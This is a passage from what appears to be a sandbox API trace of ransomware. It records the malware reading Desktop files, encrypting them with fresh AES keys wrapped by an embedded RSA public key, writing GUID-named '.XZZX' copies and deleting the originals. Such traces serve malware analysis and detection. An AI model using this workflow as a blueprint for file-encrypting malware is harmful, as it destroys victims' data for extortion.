(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ym0owp.ods")) returned 1 [0167.524] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ym0OWp.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ym0owp.ods")) returned 0 Thread: id = 568 os_tid = 0x5a4 [0167.566] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0167.566] lstrcpyW (in: lpString1=0x29af460, lpString2="YmOf4LXrg2cAXUtOgh.m4a" | out: lpString1="YmOf4LXrg2cAXUtOgh.m4a") returned="YmOf4LXrg2cAXUtOgh.m4a" [0167.566] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0167.566] SetErrorMode (uMode=0x1) returned 0x1 [0167.566] lstrcpyW (in: lpString1=0x29af860, lpString2="YmOf4LXrg2cAXUtOgh.m4a" | out: lpString1="YmOf4LXrg2cAXUtOgh.m4a") returned="YmOf4LXrg2cAXUtOgh.m4a" [0167.566] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0xc846e8c0, Data2=0x4540, Data3=0x4054, Data4=([0]=0x94, [1]=0x2, [2]=0x4, [3]=0xc2, [4]=0x27, [5]=0xe4, [6]=0xc5, [7]=0x32))) returned 0x0 [0167.566] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YmOf4LXrg2cAXUtOgh.m4a") returned 64 [0167.566] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0167.567] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2E75F0001166B900C846E8C014019D48.XZZX") returned 79 [0167.567] StrStrW (lpFirst="YmOf4LXrg2cAXUtOgh.m4a", lpSrch="XZZX") returned 0x0 [0167.567] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YmOf4LXrg2cAXUtOgh.m4a", dwFileAttributes=0x20) returned 1 [0167.567] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YmOf4LXrg2cAXUtOgh.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ymof4lxrg2caxutogh.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x998 [0167.567] ReadFile (in: hFile=0x998, lpBuffer=0x43ac728, nNumberOfBytesToRead=0x6e27, lpNumberOfBytesRead=0x29ae418, lpOverlapped=0x0 | out: lpBuffer=0x43ac728*, lpNumberOfBytesRead=0x29ae418*=0x6e27, lpOverlapped=0x0) returned 1 [0167.568] CloseHandle (hObject=0x998) returned 1 [0167.568] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x1ca0000 [0167.568] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x1cb0000 [0167.568] SetErrorMode (uMode=0x1) returned 0x1 [0167.568] lstrcpyW (in: lpString1=0x29ae358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0167.568] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cc2db0) returned 1 [0167.570] CryptGenKey (in: hProv=0x3cc2db0, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x43728b8) returned 1 [0167.723] CryptExportKey (in: hKey=0x43728b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ae41c | out: pbData=0x0*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0167.723] CryptExportKey (in: hKey=0x43728b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x1cb0000, pdwDataLen=0x29ae41c | out: pbData=0x1cb0000*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0167.723] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0167.723] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0167.723] CryptDestroyKey (hKey=0x43728b8) returned 1 [0167.723] CryptReleaseContext (hProv=0x3cc2db0, dwFlags=0x0) returned 1 [0167.724] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2E75F0001166B900C846E8C014019D48.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2e75f0001166b900c846e8c014019d48.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x998 [0167.724] WriteFile (in: hFile=0x998, lpBuffer=0x43ac728*, nNumberOfBytesToWrite=0x6e27, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43ac728*, lpNumberOfBytesWritten=0x29ae438*=0x6e27, lpOverlapped=0x0) returned 1 [0167.724] SetFilePointer (in: hFile=0x998, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x6e27 [0167.725] WriteFile (in: hFile=0x998, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0167.725] SetFilePointer (in: hFile=0x998, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x6e2c [0167.725] WriteFile (in: hFile=0x998, lpBuffer=0x29af860*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x29af860*, lpNumberOfBytesWritten=0x29ae438*=0x2c, lpOverlapped=0x0) returned 1 [0167.725] SetFilePointer (in: hFile=0x998, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x6e58 [0167.725] WriteFile (in: hFile=0x998, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0167.725] SetFilePointer (in: hFile=0x998, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x6e5d [0167.725] SetErrorMode (uMode=0x1) returned 0x1 [0167.725] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0167.725] OutputDebugStringW (lpOutputString="end") [0167.725] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x80\x8cÊ\x03`Õ\x9a\x02â", cchString=0x0, dwFlags=0x0, pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0167.725] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x29adbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8 | out: pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8) returned 1 [0167.725] CryptAcquireContextW (in: phProv=0x29ad3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x29ad3e4*=0x3cc2db0) returned 1 [0167.726] CryptImportPublicKeyInfo (in: hCryptProv=0x3cc2db0, dwCertEncodingType=0x1, pInfo=0x437f3c8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x437f3f8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x437f400*, PublicKey.cUnusedBits=0x0), phKey=0x29ad3ec | out: phKey=0x29ad3ec*=0x4372c38) returned 1 [0167.726] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0167.726] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0167.726] CryptEncrypt (in: hKey=0x4372c38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ad3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x29ad3f0*=0x80) returned 1 [0167.726] CryptEncrypt (in: hKey=0x4372c38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cc2e38*, pdwDataLen=0x29ad3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cc2e38*, pdwDataLen=0x29ad3e8*=0x80) returned 1 [0167.726] WriteFile (in: hFile=0x998, lpBuffer=0x3cc2e38*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x3cc2e38*, lpNumberOfBytesWritten=0x29ae438*=0x80, lpOverlapped=0x0) returned 1 [0167.726] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0167.726] WriteFile (in: hFile=0x998, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0167.726] GetUserNameW (in: lpBuffer=0x29ae1f8, pcbBuffer=0x29adfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x29adfe0) returned 1 [0167.726] wsprintfW (in: param_1=0x29adff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0167.726] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe4 | out: phkResult=0x29adfe4*=0x9a0) returned 0x0 [0167.727] RegQueryValueExW (in: hKey=0x9a0, lpValueName="E1010314", lpReserved=0x0, lpType=0x29adfd8, lpData=0x29adfec, lpcbData=0x29adfdc*=0x4 | out: lpType=0x29adfd8*=0x4, lpData=0x29adfec*=0xf3, lpcbData=0x29adfdc*=0x4) returned 0x0 [0167.727] RegCloseKey (hKey=0x9a0) returned 0x0 [0167.727] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe8 | out: phkResult=0x29adfe8*=0x9a0) returned 0x0 [0167.727] RegSetValueExW (in: hKey=0x9a0, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x29adfec*=0xf4, cbData=0x4 | out: lpData=0x29adfec*=0xf4) returned 0x0 [0167.727] RegCloseKey (hKey=0x9a0) returned 0x0 [0167.727] VirtualFree (lpAddress=0x1ca0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0167.727] VirtualFree (lpAddress=0x1cb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0167.727] CloseHandle (hObject=0x998) returned 1 [0167.727] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0167.728] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0167.728] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YmOf4LXrg2cAXUtOgh.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ymof4lxrg2caxutogh.m4a")) returned 1 [0167.728] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YmOf4LXrg2cAXUtOgh.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ymof4lxrg2caxutogh.m4a")) returned 0 Thread: id = 569 os_tid = 0x58c [0167.730] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0167.730] lstrcpyW (in: lpString1=0x29af460, lpString2="zexl18m.mp3" | out: lpString1="zexl18m.mp3") returned="zexl18m.mp3" [0167.730] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0167.730] SetErrorMode (uMode=0x1) returned 0x1 [0167.730] lstrcpyW (in: lpString1=0x29af860, lpString2="zexl18m.mp3" | out: lpString1="zexl18m.mp3") returned="zexl18m.mp3" [0167.730] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x85544ea9, Data2=0x9031, Data3=0x46a7, Data4=([0]=0xb5, [1]=0x6, [2]=0xf3, [3]=0x6, [4]=0x3a, [5]=0x98, [6]=0xd9, [7]=0x71))) returned 0x0 [0167.730] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zexl18m.mp3") returned 53 [0167.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0167.730] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\F1621E5927CB75F785544EA92A665A3F.XZZX") returned 79 [0167.730] StrStrW (lpFirst="zexl18m.mp3", lpSrch="XZZX") returned 0x0 [0167.730] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zexl18m.mp3", dwFileAttributes=0x20) returned 1 [0167.730] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zexl18m.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zexl18m.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x99c [0167.730] ReadFile (in: hFile=0x99c, lpBuffer=0x43b7d70, nNumberOfBytesToRead=0xa545, lpNumberOfBytesRead=0x29ae418, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesRead=0x29ae418*=0xa545, lpOverlapped=0x0) returned 1 [0167.731] CloseHandle (hObject=0x99c) returned 1 [0167.731] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x1ca0000 [0167.731] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x1cb0000 [0167.731] SetErrorMode (uMode=0x1) returned 0x1 [0167.731] lstrcpyW (in: lpString1=0x29ae358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0167.731] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cc2ec0) returned 1 [0167.733] CryptGenKey (in: hProv=0x3cc2ec0, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x43728b8) returned 1 [0167.821] CryptExportKey (in: hKey=0x43728b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ae41c | out: pbData=0x0*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0167.821] CryptExportKey (in: hKey=0x43728b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x1cb0000, pdwDataLen=0x29ae41c | out: pbData=0x1cb0000*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0167.821] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0167.822] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0167.822] CryptDestroyKey (hKey=0x43728b8) returned 1 [0167.822] CryptReleaseContext (hProv=0x3cc2ec0, dwFlags=0x0) returned 1 [0167.822] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\F1621E5927CB75F785544EA92A665A3F.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\f1621e5927cb75f785544ea92a665a3f.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x99c [0167.823] WriteFile (in: hFile=0x99c, lpBuffer=0x43b7d70*, nNumberOfBytesToWrite=0xa545, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesWritten=0x29ae438*=0xa545, lpOverlapped=0x0) returned 1 [0167.823] SetFilePointer (in: hFile=0x99c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xa545 [0167.823] WriteFile (in: hFile=0x99c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0167.824] SetFilePointer (in: hFile=0x99c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xa54a [0167.824] WriteFile (in: hFile=0x99c, lpBuffer=0x29af860*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x29af860*, lpNumberOfBytesWritten=0x29ae438*=0x16, lpOverlapped=0x0) returned 1 [0167.824] SetFilePointer (in: hFile=0x99c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xa560 [0167.824] WriteFile (in: hFile=0x99c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0167.824] SetFilePointer (in: hFile=0x99c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xa565 [0167.824] SetErrorMode (uMode=0x1) returned 0x1 [0167.824] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0167.824] OutputDebugStringW (lpOutputString="end") [0167.824] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x80\x8cÊ\x03`Õ\x9a\x02â", cchString=0x0, dwFlags=0x0, pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0167.824] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x29adbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8 | out: pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8) returned 1 [0167.824] CryptAcquireContextW (in: phProv=0x29ad3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x29ad3e4*=0x3cc2ec0) returned 1 [0167.825] CryptImportPublicKeyInfo (in: hCryptProv=0x3cc2ec0, dwCertEncodingType=0x1, pInfo=0x437f498*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x437f4c8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x437f4d0*, PublicKey.cUnusedBits=0x0), phKey=0x29ad3ec | out: phKey=0x29ad3ec*=0x4372c78) returned 1 [0167.825] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0167.825] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0167.825] CryptEncrypt (in: hKey=0x4372c78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ad3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x29ad3f0*=0x80) returned 1 [0167.825] CryptEncrypt (in: hKey=0x4372c78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cc2f48*, pdwDataLen=0x29ad3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cc2f48*, pdwDataLen=0x29ad3e8*=0x80) returned 1 [0167.825] WriteFile (in: hFile=0x99c, lpBuffer=0x3cc2f48*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x3cc2f48*, lpNumberOfBytesWritten=0x29ae438*=0x80, lpOverlapped=0x0) returned 1 [0167.825] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0167.825] WriteFile (in: hFile=0x99c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0167.825] GetUserNameW (in: lpBuffer=0x29ae1f8, pcbBuffer=0x29adfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x29adfe0) returned 1 [0167.826] wsprintfW (in: param_1=0x29adff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0167.826] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe4 | out: phkResult=0x29adfe4*=0x9a4) returned 0x0 [0167.826] RegQueryValueExW (in: hKey=0x9a4, lpValueName="E1010314", lpReserved=0x0, lpType=0x29adfd8, lpData=0x29adfec, lpcbData=0x29adfdc*=0x4 | out: lpType=0x29adfd8*=0x4, lpData=0x29adfec*=0xf4, lpcbData=0x29adfdc*=0x4) returned 0x0 [0167.826] RegCloseKey (hKey=0x9a4) returned 0x0 [0167.826] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe8 | out: phkResult=0x29adfe8*=0x9a4) returned 0x0 [0167.826] RegSetValueExW (in: hKey=0x9a4, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x29adfec*=0xf5, cbData=0x4 | out: lpData=0x29adfec*=0xf5) returned 0x0 [0167.826] RegCloseKey (hKey=0x9a4) returned 0x0 [0167.826] VirtualFree (lpAddress=0x1ca0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0167.826] VirtualFree (lpAddress=0x1cb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0167.827] CloseHandle (hObject=0x99c) returned 1 [0167.827] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, 